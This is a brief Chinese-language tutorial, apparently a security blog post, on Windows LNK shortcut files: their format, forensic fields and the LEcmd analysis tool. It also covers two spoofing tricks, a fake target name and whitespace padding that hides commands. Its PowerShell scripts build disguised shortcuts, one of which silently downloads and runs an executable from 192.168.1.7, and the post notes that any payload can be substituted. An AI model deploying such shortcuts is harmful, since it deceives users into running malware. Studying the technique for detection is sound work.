介绍
LNK是Microsoft Windows用于指向可执行文件或应用程序的快捷方式文件的文件扩展名。LNK文件通常用于创建开始菜单和桌面快捷方式。
Lnk文件格式
较详细的分析可以参考:https://bbs.kanxue.com/thread-260953.htm#msg_header_h2_1
可以关注的项有:CreationTime、AccessTime、WriteTime、sLinkInfo、RELATIVE_PATH、WORKING_DIR、ICON_LOCATION
LNK文件基本分析
查看属性:
属性栏信息欺骗:这里假装notepad.exe是链接文件名表达的原本调用的程序(正常程序),cmd.exe为实际执行的恶意程序。这里我们可以通过修改lnk文件的文件选项达到将恶意程序名修改为notepad.exe的效果,即在属性面板里的目标里显示的是执行notepad.exe,但实际执行的是cmd.exe。点击该链接后:
字符长度欺骗:快捷方式>目标的最大长度只有260个字符。任何超过这个长度的东西都是不可见的。但是,命令行参数的最大长度是4096个字符,我们可以在执行的命令行中插入空格,超过目标字段展示的260字符的长度,之后则无法在上面的窗口中看到整个命令。
$file = Get-Content "C:\Users\zw1sh\Desktop\zwish.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Users\zw1sh\Desktop\zwish.lnk")
$Shortcut.TargetPath = "%SystemRoot%/system32/cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%/System32/Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe"
$Shortcut.Save()
LEcmd工具分析:https://ericzimmerman.github.io/#!index.md
同理,只需要把上述执行的命令换成payload即可利用。